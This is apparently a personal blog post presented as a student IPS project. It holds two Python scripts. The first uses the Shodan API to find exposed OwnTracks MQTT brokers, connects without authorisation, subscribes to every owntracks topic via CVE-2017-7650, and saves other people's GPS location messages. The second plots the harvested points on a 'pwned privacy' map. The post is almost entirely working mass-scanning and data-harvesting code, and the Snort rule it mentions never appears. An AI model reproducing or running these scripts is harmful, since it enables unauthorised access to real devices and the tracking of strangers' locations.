Previously I was working on university minor project (IPS system for IoT devices). So, I have picked up CVE-2017-7650 to define snort rule for it. I was thinking how someone can leverage this silly vulnerability and I asked my self in current IoT space what kind of data can compromise user’s privacy. Yes, it is GPS data. I am big fan of Python programming and wanted to use it’s power, so I wrote to small python scripts which gathers list of IP addresses from Shodan API, tries to connect on those IPs as MQTT client. If connection is established successfully(this happens because no ACL is present on those IPs), script will try to subscribe all owntracks topics with help of CVE-2017-7650 and stores GPS data in .json file later utilised by second script which tries to map out those GPS points.

mqtt-owntracks-pwn.py

import paho.mqtt.client as mqtt
import shodan
import time
import os, sys, socket

#Some house cleaning
if sys.platform != "win32":
    os.system('clear')
else:
    os.system('cls')

#Shodan API config
SHODAN_API_KEY = "" #Sign up for new account at https://www.shodan.io and Put your shodan API key here(if you are university student please register with your university mail id to get fully featured account for free)
shodan_api = shodan.Shodan(SHODAN_API_KEY)
results = shodan_api.search("owntracks port:1883")


def on_connect(client, userdata, flags, rc):
    print("[+] Connection successful")
    client.subscribe('owntracks/#', qos = 1)        # Subscribe to all topics

def on_message(client, userdata, msg):
    if msg.payload != "":
        print ('[+] Topic: %s \n[+] Message: %s \n' % (msg.topic, msg.payload))
        f = open('CVE-2017-7650_owntracks_geodata.json', 'a+')
        f.write("%s\n" % (msg.payload))
        f.close()
    else:
        print('Device is not vulnerable')

client = mqtt.Client(client_id = "MqttClient")
client.on_connect = on_connect
client.on_message = on_message

for result in results['matches']:
    ip_addr = result['ip_str']
    f = open('CVE-2017-7650_owntracks_geodata.json', 'a')
    print('[+] Data recieved from: ' + ip_addr + '\n\n\n')
    f.close()
    try:
        client.connect(ip_addr, 1883, 60)
    except socket.error, e:
        print('[+] Error could not connect to ' + ip_addr)
        continue
    client.loop_start()
    time.sleep(6)
    client.loop_stop()
    client.disconnect()

    # Author: CJHackerz

gps-location-mapper.py

import folium
import json
from time import sleep


geo_map = folium.Map(location=[0, 0],
    zoom_start=3
)

with open('CVE-2017-7650_owntracks_geodata.json', 'r') as json_file:
    
    #Iterating through json objects in each new line
    for data in json_file:
        geo_data = json.loads(data)
        
        #To avoid encrypted data and json objects which does not have lat and lon attributes
        try:
            folium.Marker([geo_data['lat'], geo_data['lon']]).add_to(geo_map)
        except KeyError:
            continue

geo_map.save('pwned_privacy_map.html')

End result